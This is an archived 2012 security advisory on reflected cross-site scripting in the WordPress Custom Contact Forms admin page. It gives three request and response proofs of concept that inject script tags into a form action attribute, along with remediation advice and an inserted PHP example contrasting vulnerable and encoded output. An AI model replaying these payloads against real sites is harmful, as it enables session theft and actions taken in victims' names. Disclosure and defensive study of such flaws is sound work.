WordPress Custom Contact Forms Cross Site Scripting

2012-05-11T00:00:00
ID PACKETSTORM:112616
Type packetstorm
Reporter SiNA Rabbani
Modified 2012-05-11T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Wordpress Security audit  
Custom Contact Forms  
  
1. Cross-site scripting (reflected)  
  
1.1. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
1.2. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
1.3. http://127.0.0.1/wp-admin/options-general.php [x parameter]  
  
  
Issue background  
Reflected cross-site scripting vulnerabilities arise when data is  
copied from a request and echoed into the application's immediate  
response in an unsafe way. An attacker can use the vulnerability to  
construct a request which, if issued by another application user, will  
cause JavaScript code supplied by the attacker to execute within the  
user's browser in the context of that user's session with the application.  
  
The attacker-supplied code can perform a wide variety of actions, such  
as stealing the victim's session token or login credentials,  
performing arbitrary actions on the victim's behalf, and logging their  
keystrokes.  
  
Users can be induced to issue the attacker's crafted request in  
various ways. For example, the attacker can send a victim a link  
containing a malicious URL in an email or instant message. They can  
submit the link to popular web sites that allow content authoring, for  
example in blog comments. And they can create an innocuous looking web  
site which causes anyone viewing it to make arbitrary cross-domain  
requests to the vulnerable application (using either the GET or the  
POST method).  
  
The security impact of cross-site scripting vulnerabilities is  
dependent upon the nature of the vulnerable application, the kinds of  
data and functionality which it contains, and the other applications  
which belong to the same domain and organisation. If the application  
is used only to display non-sensitive public content, with no  
authentication or access control functionality, then a cross-site  
scripting flaw may be considered low risk. However, if the same  
application resides on a domain which can access cookies for other  
more security-critical applications, then the vulnerability could be  
used to attack those other applications, and so may be considered high  
risk. Similarly, if the organisation which owns the application is a  
likely target for phishing attacks, then the vulnerability could be  
leveraged to lend credibility to such attacks, by injecting Trojan  
functionality into the vulnerable application, and exploiting users'  
trust in the organisation in order to capture credentials for other  
applications which it owns. In many kinds of application, such as  
those providing online banking functionality, cross-site scripting  
should always be considered high risk.  
  
Issue remediation  
In most situations where user-controllable data is copied into  
application responses, cross-site scripting attacks can be prevented  
using two layers of defences:  
  
Input should be validated as strictly as possible on arrival, given  
the kind of content which it is expected to contain. For example,  
personal names should consist of alphabetical and a small range of  
typographical characters, and be relatively short; a year of birth  
should consist of exactly four numerals; email addresses should match  
a well-defined regular expression. Input which fails the validation  
should be rejected, not sanitised.  
  
User input should be HTML-encoded at any point where it is copied into  
application responses. All HTML metacharacters, including < > " ' and  
=, should be replaced with the corresponding HTML entities (&lt; &gt;  
etc).  
  
In cases where the application's functionality allows users to author  
content using a restricted subset of HTML tags and attributes (for  
example, blog comments which allow limited formatting and linking), it  
is necessary to parse the supplied HTML to validate that it does not  
use any dangerous syntax; this is a non-trivial task.  
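The following is an added example, not code from the Custom Contact Forms plugin or from this report. It contrasts the escaping visible in the findings below, where the injected quote comes back as `\"` (a backslash escape that an HTML parser does not honour, so the attribute is still closed) with the HTML-entity encoding the second remediation layer calls for. The function names, the constructed request URI and the use of addslashes() to model the observed backslash behaviour are assumptions; the plugin's actual code is not shown on this page. In WordPress, esc_attr() and esc_url() are the helpers that perform this encoding; htmlspecialchars() is used here so the block runs stand-alone.

```php
<?php
// Added example (not the plugin's code): encoding a request-derived value
// before it is placed in a double-quoted HTML attribute.

// Models the behaviour seen in the report: the quote is backslash-escaped
// (addslashes-style). A browser's HTML parser ignores the backslash, so the
// payload's "> still terminates the attribute and <script> reaches the page.
// (Assumption: the plugin's real escaping step is not shown on the page.)
function render_form_action_vulnerable(string $requestUri): string
{
    $escaped = addslashes($requestUri);
    return '<form method="post" action="' . $escaped . '">';
}

// Hardened: replace every HTML metacharacter (< > " ' &) with its entity
// before the value lands inside the attribute. ENT_QUOTES covers both quote
// styles; the charset argument prevents encoding-confusion bypasses.
// WordPress equivalents: esc_url() for a URL, esc_attr() for other attributes.
function render_form_action_safe(string $requestUri): string
{
    $encoded = htmlspecialchars($requestUri, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form method="post" action="' . $encoded . '">';
}

// Minimal check for the attribute break-out pattern named in the report:
// a literal "><script sequence in the rendered markup means the attribute
// boundary was crossed.
function attribute_breakout_present(string $html): bool
{
    return strpos($html, '"><script') !== false;
}

// Constructed input shaped like the report's payload: an arbitrary parameter
// name carrying a quote and a script tag, as echoed into the form action.
$uri = '/wp-admin/options-general.php?page=bb2_options&x=1'
     . '&c0cbb"><script>alert(1)</script>ce5abb2ef55=1';

$vuln = render_form_action_vulnerable($uri);
$safe = render_form_action_safe($uri);

echo $vuln, PHP_EOL;  // attribute closed early; script tag is live markup
echo $safe, PHP_EOL;  // entity-encoded; the whole payload stays inert text

var_dump(attribute_breakout_present($vuln));
var_dump(attribute_breakout_present($safe));
```

Run with `php example.php`. The check function is deliberately narrow (it recognises only the `"><script` shape used in this report); the fix is the encoding in render_form_action_safe(), not the check, which serves only to make the difference between the two renderings observable.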
  
  
  
1.1. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
  
Summary  
  
Severity: High  
Confidence: Certain  
Host: http://127.0.0.1  
Path: /wp-admin/options-general.php  
  
Issue detail  
  
The name of an arbitrarily supplied request parameter is copied into  
the value of an HTML tag attribute which is encapsulated in double  
quotation marks. The payload  
c0cbb"><script>alert(1)</script>ce5abb2ef55 was submitted in the name  
of an arbitrarily supplied request parameter. This input was echoed as  
c0cbb\"><script>alert(1)</script>ce5abb2ef55 in the application's  
response.  
  
This proof-of-concept attack demonstrates that it is possible to  
inject arbitrary JavaScript into the application's response.  
  
Request  
GET  
/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIP/c0cbb"><script>alert(1)</script>ce5abb2ef55T%3E  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)  
Gecko/20100101 Firefox/11.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie:  
wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C0bc36ed70eff4d014b8f8f399e7931d9;  
bb2_screener_=1334008049+127.0.0.1;  
PHPSESSID=r0pobhl4p21uu57ek6lpdabr76;  
wordpress_test_cookie=WP+Cookie+check;  
wp-settings-1=widgets_access%3Doff%26uploader%3D127;  
wp-settings-time-1=1334005698;  
wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C68a0d9df0911bd2b367c681b0981811a  
  
Response  
HTTP/1.1 200 OK  
Date: Mon, 09 Apr 2012 21:56:22 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.6  
Set-Cookie: bb2_screener_=1334008582+127.0.0.1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Last-Modified: Mon, 09 Apr 2012 21:56:22 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Content-Length: 27835  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
<!--[if IE 8]>  
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" dir="ltr"  
lang="en-US">  
<![endif]-->  
<!--[if !(IE 8) ]><!-->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr  
...[SNIP]...  
<form method="post"  
action="/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIP/c0cbb\"><script>alert(1)</script>ce5abb2ef55T%3E">  
...[SNIP]...  
  
  
1.2. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
  
Summary  
  
Severity: High  
Confidence: Certain  
Host: http://127.0.0.1  
Path: /wp-admin/options-general.php  
  
Issue detail  
  
The name of an arbitrarily supplied request parameter is copied into  
the value of an HTML tag attribute which is encapsulated in double  
quotation marks. The payload  
dafab"><script>alert(1)</script>70272c82dd9 was submitted in the name  
of an arbitrarily supplied request parameter. This input was echoed as  
dafab\"><script>alert(1)</script>70272c82dd9 in the application's  
response.  
  
This proof-of-concept attack demonstrates that it is possible to  
inject arbitrary JavaScript into the application's response.  
  
Request  
GET  
/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E&dafab"><script>alert(1)</script>70272c82dd9=1  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)  
Gecko/20100101 Firefox/11.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie:  
wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C0bc36ed70eff4d014b8f8f399e7931d9;  
bb2_screener_=1334008049+127.0.0.1;  
PHPSESSID=r0pobhl4p21uu57ek6lpdabr76;  
wordpress_test_cookie=WP+Cookie+check;  
wp-settings-1=widgets_access%3Doff%26uploader%3D127;  
wp-settings-time-1=1334005698;  
wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C68a0d9df0911bd2b367c681b0981811a  
  
Response  
HTTP/1.1 200 OK  
Date: Mon, 09 Apr 2012 21:55:48 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.6  
Set-Cookie: bb2_screener_=1334008548+127.0.0.1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Last-Modified: Mon, 09 Apr 2012 21:55:48 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Content-Length: 27815  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
<!--[if IE 8]>  
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" dir="ltr"  
lang="en-US">  
<![endif]-->  
<!--[if !(IE 8) ]><!-->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr  
...[SNIP]...  
<form method="post"  
action="/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E&dafab\"><script>alert(1)</script>70272c82dd9=1">  
...[SNIP]...  
  
  
1.3. http://127.0.0.1/wp-admin/options-general.php [x parameter]  
  
Summary  
  
Severity: High  
Confidence: Certain  
Host: http://127.0.0.1  
Path: /wp-admin/options-general.php  
  
Issue detail  
  
The value of the x request parameter is copied into the value of an  
HTML tag attribute which is encapsulated in double quotation marks.  
The payload cf999"><script>alert(1)</script>cf9a9137481 was submitted  
in the x parameter. This input was echoed as  
cf999\"><script>alert(1)</script>cf9a9137481 in the application's  
response.  
  
This proof-of-concept attack demonstrates that it is possible to  
inject arbitrary JavaScript into the application's response.  
  
Request  
GET  
/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3Ecf999"><script>alert(1)</script>cf9a9137481  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)  
Gecko/20100101 Firefox/11.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie:  
wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C0bc36ed70eff4d014b8f8f399e7931d9;  
bb2_screener_=1334008049+127.0.0.1;  
PHPSESSID=r0pobhl4p21uu57ek6lpdabr76;  
wordpress_test_cookie=WP+Cookie+check;  
wp-settings-1=widgets_access%3Doff%26uploader%3D127;  
wp-settings-time-1=1334005698;  
wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C68a0d9df0911bd2b367c681b0981811a  
  
Response  
HTTP/1.1 200 OK  
Date: Mon, 09 Apr 2012 21:50:48 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.6  
Set-Cookie: bb2_screener_=1334008248+127.0.0.1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Last-Modified: Mon, 09 Apr 2012 21:50:48 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Content-Length: 27848  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
<!--[if IE 8]>  
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" dir="ltr"  
lang="en-US">  
<![endif]-->  
<!--[if !(IE 8) ]><!-->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr  
...[SNIP]...  
<form method="post"  
action="/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3Ecf999\"><script>alert(1)</script>cf9a9137481">  
...[SNIP]...  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
  
iQIcBAEBAgAGBQJPrDhlAAoJEJPBwXYLR9VthYMP/jhPBJfnZORW2aOhd+NyHN3c  
+w07C1ORfs2dd0jqmv/YxodtCz9iaxYGrUNdnMtWi4aXf5dmByyGMl26QBu1+B5S  
2fuJpbXhR8ieFrk1bdXsLGgA6UDhoiBGjmHjH2bW8IrunKxJdEWrwwpsD9kP2uxU  
5N4ARvPLPGFdRGaeudrRB0ZGLgyGnvpOXUP4pUPtF/pduvM3fw8HgppI0aHLgLZl  
yJ6tO+fCE7Shzg7By0BgxpIWOZwtL0blgnn4Wu+zf/exfuQDg0PlIKG+PsmwR8uQ  
t5ftN2AHhNQOmXA9Puz/S4u3oF4xfYdN0qFRLUWggynvn9d7vUttD94n96nqREed  
+DwZzgnIN4DlYD03zywrm8Vq6e/h9n2jjZ/JBdju00FSy/XBAZpL7wLEohvHcN2q  
eiga2A8wdLpOT2lWpBWO0U4gmY8E3y3aIvZzRRWiKxDQjO/k6H9otnNeFtqoR92Z  
NnfYd9BQ2RG6pLQZxjM+BLLZcSiwk6bU5DCefd2HXOQeALhWKQQGZLC2oCwBgqHa  
BMs8iSpBR5qnukzMfdt0KmtwvDn92QJ7z8oaeJpsbSdDa2i5LaAO671odJEVnieQ  
irfLv69S5rubENsv43kj/VMNCBcTQKno4fB4r0YIOffiGCXOFtrCtJjqtsBwMxF3  
yF0NRLi0Sj7nyNHGkn2Y  
=kdl7  
-----END PGP SIGNATURE-----  